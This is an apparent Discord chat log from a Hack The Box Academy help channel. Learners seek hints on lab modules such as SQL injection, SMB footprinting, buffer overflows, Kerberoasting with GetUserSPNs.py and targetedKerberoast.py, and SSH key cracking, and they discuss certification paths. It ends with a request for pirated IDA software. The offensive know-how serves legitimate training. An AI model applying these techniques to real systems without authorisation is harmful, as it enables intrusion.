well each module has a list of retired machines that relate to the skill discussed in the module (sometimes you'll need to apply multiple skills)

Oh I see, there were only additional modules after the first module. Maybe it changes in the next one

I am totally noob. Sry but. Can someone help with a guide maybe. In htb academy I am simply trying to access the web browser in the very first module with parrot htb and a VM of the module instance. I can ping the target but cannot on the browser. I don't have the vpn up and can't find it. I know this is stupid question and I'll have to dive into it more but I'm just having noob issues?

Module: SQL Injection Fundamentals
First SQLi exercise

I'm getting the successful but I don't see a flag, help?

why is there no flag?

serbian

flag

hello I'm new to HTB and I'm struggling with the module of Footprinting SMB last question "What is the full system path of that specific share?"
I manage to get a user name "nobody" but unable to find the password to enable me to use the rpcclient to use the command netsharegetinfo <share> to get the path
am i on the right track ? feel so lost any help given will be very appreciated ty for reading

you’re on the right track

look at the hint 😉

strange

hi y'all folks, I updated the beans.xml file and double-clicked over the new fatty-client-new .jar executable, BUT when I type the creds discovered into note3 nothing happen, any idea?, this is for Exploiting Web Vulnerabilities in Thick-Client Applications

driving me nuts. i cant figure out whats going on

Are you perhaps injecting into the first column? Inject into a different column, the first which should be the id column does not display on the page

Solved with the help of eatthebuffet, thank you tho man!

alright man!

it's likely the flag is not on the html code. try looking elsewhere using Gobuster or fuff

follow the redirect with -L

the -L option...follows redirects, idk what that means exactly, though i haven't completed the intro to webapps module yet

It means it will literally follow the redirect, so it will show you the page the 301 is redirecting you to

or in this case the curl of the page since it's in CLI

A domain has a redirect usually when the requested content is hosted on some other page or requires authentication to be accessed , e.g Status codes 300-399 so you need to tell curl to follow the redirect with -L

but on a domain like inlanefreight.com you wouldn't be redirected right? because the front page is there and all?

im new so idk, but i understand what you are saying.

I do not know the web application youre working on or the challenge but I could give a scenerio - If inlanefrieght.com had a landing page index.php that was temporarily or permanently moved to be hosted on another page say land.php, you would get a redirect ("Permanently moved") to land.php

It depends on how the application was configured.

If it were in PHP, there would be a Location Header that tells that a requested content no longer exists on a particular URI

but has been moved to another

Or requires authentication to be accessed

yeah i figured you'd do something like that on the backend

atm all i know from what i've learned is the php interpreter on the backend spits out an html you requested for a query you use it in the getting started (pentesting) module

i friend used my reference code and still i didnt get cubes. why?

alright so try to run the previous command with a -L

strange

well i saw that it puts out a location i can't paste it into a codeblock here the bot stops me from doing it

bunch of other headers

oh wait nope sorry i did -IL i see a huge html code now

cool, if the flag is in the htb format you could just curl -L http://$IP/ | grep -i htb

oh I'm not looking for a flag in the website, it's available in clearnet, it was @restive basin

I just finished the nmap module, and it was pretty nice what you learn, most the questions left me relying on the internet for answers lmao no way i would've gotten them on my own

"find the most recently added special service" lol

Okay sorry y'all I've gone through the 26 other posts trying to solve this have googled and search on HTB Academy forum and cannot seem to find the answer for the question on the Linux Fundamentals->Find Files and Directories Q1.) What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

I've used different variants of the command:** find / -type f -name .conf -user root -size +25 -size -28 -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null*. I've tried changing name to *conf, I've tried without user command, I've tried without exec ls but nothing is giving any answers that works. I've checked out the video on YouTube of stuffy24 and didn

^and didn't see a solution to this problem.

Havent done this module but was it indicated that the owner of the config file is the root user? also .conf is not the only linux configuration file extension

try running the command again with -iname "*conf*" instead of -name and without specifying a user

I will try that real quick thank you @faint rampart

also you arent closin the -exec argument properly.

It should error out instead use -exec ls -la {} \;

@faint rampart here is the most recent code I tried it isn

isnt pulling up any files find -type f -iname *.conf -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null

find / -type f -name "*.conf" -size +25k -size -28k -newermt 2020-03-03 -exec ls -la {} \; 2>/dev/null

missed a backslash there

I think discord filters that out back slashes that arent in code blocks

ya i was gunna say the slash isnt showing up on discord im gunna try to add a screenshot

Attacking Authentication Mechanisms module question:
In the section "Weak Public/Private Keys" I'm not able to import the certificates into SAML Raide Certificates. It just shows the error message: "Error reading file. (signed overrun, bytes = 466)".
Did anyone faced the same issue?

It interpreted it as an escape char

use backticks. 3on the outside ``` like so

3 on each side.

print(hello)
``` it'll appear like this. If you use 1 it'll look like this `print(Hello)`

https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline-

It'll help you show what you are actually sending when y ou need help with modules 🙂

excuse me sir your python snippet is wrong, hello is not defined, please make sure to declare the variable beforehand or if you're trying to print a string directly, wrap "hello" in quotes 🤓

Thank you everyone the quotations made a huge difference gosh I feel so silly missing such a detail, but I don't feel like it was mentioned in the module. Perhaps I should take another read through.

when is the senior web penetration tester path going to have a discord section?

when the cert comes out probably

ok got it

but the learning path is already up?

so I didn't know the learning path and cert comes out a different times

interesting

by the time I complete CPTS there's gonna be a bunch of different penetration testing paths lmao

🤷‍♂️ it will take a couple of months before someone finishes the new path

right ok

Hey ! I was doing stack_bof_linux module and in the final Assessment they ask you to submit size of the stack after overflowing the EIP

I did that but the answer is not true for some reason
I used info proc mapping / info proc all

Got the root flag as well but still can't find the answer to that

been a while since I've finished it but I think you're supposed to find the aswer in gdb

are the pro labs worth it in your view?

Yeah i did that previous section had the same question . and by checking the same way i did r8now the answer was acceptable

I've rebooted the machine tried multiple times but the stack size is not acceptable as the answer

0x55555555 in ?? ()```

    0xfffdd000 0xffffe000    0x21000        0x0 [stack]```

0x21000

try using info proc all in gdb

yeah they're very fun to do and well made, you can do 2-3 pro labs with a single month of sub

oh cool

what difficulty are they tho?

new AD advance module look so cool and scary

That module is on my todo list...

Yeah did that as well

Restarted machine

Im gonna check if its teaches a technique i like a lot for persistence: golden certificate

varies, dante is the easiest, zephyr is full AD, offshore is slightly more difficult than those

that's in the kerberos attacks module

Please read #rules and #welcome Thank you.

This module focuses on privilege escalation attacks by abusing misconfigurations in Active Directory Certificate Services.

that the description said

i dont say about a golden ticket, im talking about a golden certificate generated in a PKI

: ) .. Just asking simple question about a room

I'm getting a feeling there's gonna be a more advanced learning path that builds upon CPTS soon. I mean they just made one for CBBH so its a guess.

it is

I'm already doing it

that should give you the answer

Is it good?

Answer is there i can see it , but it's not acceptable for some reason

    0xfffdd000 0xffffe000    0x21000        0x0 [stack```

I can see the size of the stack

But room is not accepting that as an answer

No I know there's a "Senior Web Penetration Tester" path but I predict there also probably will be a "Senior Pentesting Specialist" path too by the time I complete CPTS

yes its on going

advance AD

yeah, not very far into it yet but it's the standard you'd expect for these types of modules

but they already have an advanced AD path

so you can confirm? how'd you get this information if I may ask

i dont see advance AD path yet in academy

well idk how to tell you without giving the answer but 0x21000 is slightly off

Ok so there's an AD path where all of the sections are hard level. So your saying there's gonna be another path that goes even further?

Well that's what i'm getting after restarting the machine mulitiple times and checking the stack after overflowing eip with info proc all command

like insane level?

(:

someone say that, HTB will make advance AD path like CWEE

ok but what about a path that builds upon CPTS path? have you heard anything on that?

and what about a wireless hacking path?

or reverse engineering, OSINT, or social engineering?

one of those would be perfect

Can anyone help me out with problems I am having with targetedKerberoast.py? I am not sure if I am having time scew issues or if something else is broken.

Python penetration testing path would be perfect

I think you could have a path that combines SE and OSINT into a path no?

best I can give you is your answer is 1000 off, I forgot how I got it exactly but pretty sure it was just info proc all

Thankyou 🙂

its expected you know a little bit of scripting before you begin no? Also, they do have an intro to Python course. However, I have not done it.

a course but not an entire learning path. ya I am learning Python currently. I probably will be ready by the time the path comes out since I don't expect it to come out tomorrow

a C/C++ exploit development path would be fabulous

it's likely that one is coming but nothing concrete yet, but probably not wireless though

As for the senior path, its definitely required.

ya ok. I guess we don't have to have everything

that module is very basic haha

I'm thinking of something beyond basic or that goes through a more advanced level. Something that uses Python to expand upon skills built in the other penetration testing paths

this would really be a good idea

and by that point your an advanced hacker

minus maybe the wireless skills and other skills

but someone who completed all of that would be very impressive

I feel like an OSINT path would flow quite nicely

in my view

htb academy subscription is so expensive man

what is it

500$

I am getting this error:

If you are a student you can get it for 8$/mo + cost of certification exam and you get access to all Tier 2 modules and below.

I know. I have student discount. I generally pay monthly. But I would pay yearly if most of the learning paths I'm thinking of actually came out. Right now I have student discount.

what is cost of yearly subscription after student discount?

im talking about academy

student discount is $8 per month for academy

sync clock, search up the ways you can do it

so after that its $18/month for similar

Yes, I have tried ntpdate and faketime, but they aren't working

but if you pay yearly you get access to more advanced stuff

whats the cost after student discount

if you pay for the gold annual member, not if you pay for the silver annual.

its about 100$ for the year. + cost for certification attempts.

then you didn't do it right, ntpdate against the DC

thats much better

it's also not a "discount" btw, it's a student plan for $8 a month

This is what I did:

but if you have questions regarding pricing you can always contact support. 🙂

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

ya I know but I would save up money to pay for gold once I get my part-time job at Apple Store just to be able to work through the advanced stuff

because its probably worth it long term

I may get a separate bank account and save up money or for buying cubes or some shit

because its probably worth it for the skills

that should work, try again after that, if it still doesn't work, reset the target

is the upcoming CWEE cert > then OffSec's OSWE?

Okay, thanks...I did a fresh install of kali, so I was wondering if that had anything to do with it because it was working beore

I doubt the fresh install would be the problem

if the track record of both is anything to go by, CWEE's content and exam will be far superior than OSWE

wow ok. that's great. ya that's why I think its worth it

because then what's better: having OSWE + OSEP certs that employers recognized or having more advanced skills from HTB Academy and frankly be able to pass all of those OffSec ezpz but being far more skilled?

what is better for a penetration testing career? seriously

better hacking skills is what I want tbh

all they need is exploit development courses and reverse engineering courses IMO

or reverse engineering/exploit dev learning paths

and there's enough material to be superior to OffSec

that's the only thing missing

in terms of skills

I do think that by the time you start OSEP there should be some experience under your belt which can speak for themselves without needing the certs, and anyways those should really be paid by your employer from the training budget

doing the advanced certs without first getting some experience is not ideal imo

I know and HTB Academy gets you a lot more experience

like in terms of hacking skills

well, yes, but you can't replace real world experience, employers care more about those

GetUserSPNs.py works but targetKerberoast.py doesn't...do you know why that could be?

wouldn't bug bounties be a good way of getting real world experience? I mean I totally get it

ya no I get it

no clue, I don't use targetKerberoast.py, it's always been GetUserSPNs.py or netexec

I gotta get to bed but ya this is crazy stuff

nxc --kerberoasting isn't working for me either

I'm gonna get some shut eye. good night everyone

same error?

Yes:

that's a totally different error isn't it

what module section is that

hecker

Seems to be confirmed now 😉

can't believe it's not called certified weiner exploitation expert

https://tenor.com/view/disappointment-disappointed-food-review-meme-gif-16003613

Maybe you need a lot of wine after the exam to wash away the frustration

booooooooooooo

i think its more about hot dogs weiners

lol you should get verified by following the instructions at #welcome so your messages don't get deleted

i cant verify myself -- it errors out

should be just /identify <your htb identifier>

Identification error: please contact an online Moderator or Administrator for help.

well maybe you should do that then

How can i reach admin

dm @languid fjord probably (sorry for ping 🫡 )

it's a sat so it might take a while

You can send me a dm

Module: Attack Web Apps Section: Other Notable Apps --- connection issues: ```PING 10.129.201.102 (10.129.201.102) 56(84) bytes of data.
64 bytes from 10.129.201.102: icmp_seq=1 ttl=127 time=368 ms
64 bytes from 10.129.201.102: icmp_seq=2 ttl=127 time=1900 ms
64 bytes from 10.129.201.102: icmp_seq=3 ttl=127 time=1036 ms
64 bytes from 10.129.201.102: icmp_seq=4 ttl=127 time=168 ms
64 bytes from 10.129.201.102: icmp_seq=5 ttl=127 time=3834 ms
64 bytes from 10.129.201.102: icmp_seq=6 ttl=127 time=2956 ms
64 bytes from 10.129.201.102: icmp_seq=7 ttl=127 time=1945 ms
64 bytes from 10.129.201.102: icmp_seq=8 ttl=127 time=929 ms
64 bytes from 10.129.201.102: icmp_seq=9 ttl=127 time=98.2 ms

Oh, discord channel for new cert only dropping when exam drops? Just curious.

tbh, i don't know

Probably the fastest internet in the world

switch vpn server, check your connections, get better internet? not much can be done tbh

Our first advanced level cert 🔥💪🏻

I'm looking forward to it. But I'm sure I still have a lot to learn

It will be possible to buy the exam using a voucher (after the path)? Or only from the gold plan?

@next bronze changed vpn but connection issues persist -- dont think my internet is slow -- maybe you can spawn that machine to see if it works for you?

Previously, there were separate examination vouchers for the Certs. I think that's the case again.
There are people like me who bought the cubes for the modules. The subscription does nothing for me.

works for me

ping is also stable?

Yeah, same for me. I've done CBBH and from cubes that i already have even with the discount the subscription can be unconvenient.

Module Windows Privilege Escalation/Citrix Breakout: cannot connect from the Citrix machine to my smbclient. Connect from my localhost works fine. Tried own VM and pwnbox. I see few questions but none of them were answere, any ideas how to resolve? Thanks.

the citrix instance can only connect to the linux machine you RDP'd into

hey i am old here

@sullen cedar

its me]

anyone help me pass the academy module

interactive section with terminal

alr

its wrong

@gaunt surge

Hi I am stuck in the password attacks module. I am at the protected files section. There is only one task
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
I cannot remember if I ever cracked someone named kira. Can someone nudge me in the right direction as I cannot even log in to the machine. At this point I have started a brute force attack. if you have the password for kira and think I am in the right direction please dm me the password

you cracked the kira password in one of the previous sections

I was checking all the previous sections could not find it. and I have started taking detailed notes from pass-the-hash section. Can you please tell me which section I have to redo again?

you can crack in the current section you’re in now

hi guys i am stuck in this question
Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.

i did this 10.10.10.0/29

but it shows incorrect

@sterile epoch

stop randomly @ ing people

hey
@sullen cedar is my account only
duxsec is my friend
and i pinged this guy for my question

that's... not how you're gonna get answered tbh

https://www.calculator.net/ip-subnet-calculator.html here's something to help you get started

thx marcie

take a look at this as well

https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/tcpip-addressing-and-subnetting

i already know this but thx

note i found this information by using the all powerful "Google"

yea

well if you already knew it, you wouldn't be struggling

Not using chatgpt?

No, I don't tend to use chatGPT so I can find information more reliably

¯_(ツ)_/¯

Be nice to each other guys!

Don't wanna go off potentially incorrect information

This isn't passive aggressive box

So you are doing tasks slower

its not helping

Generally most the stuff for chat got you'd use is going to properly classified

hi i need help im getting really frustrated with this one im doing "Linux privalage escilation" and the Linux Services & Internals Enumeration part. the question is What is the latest Python version that is installed on the target? i have checked everything they named in the module at this time and i only get the same python version every time Python 3.8.10 . help me please

Choosing chat for something involving people

is it asking for just the version number or the full "Python 3.8.10"

this is me being nice

No this is you with dunning kruger

You have a tiny bit of info

Go get me a cracked IDA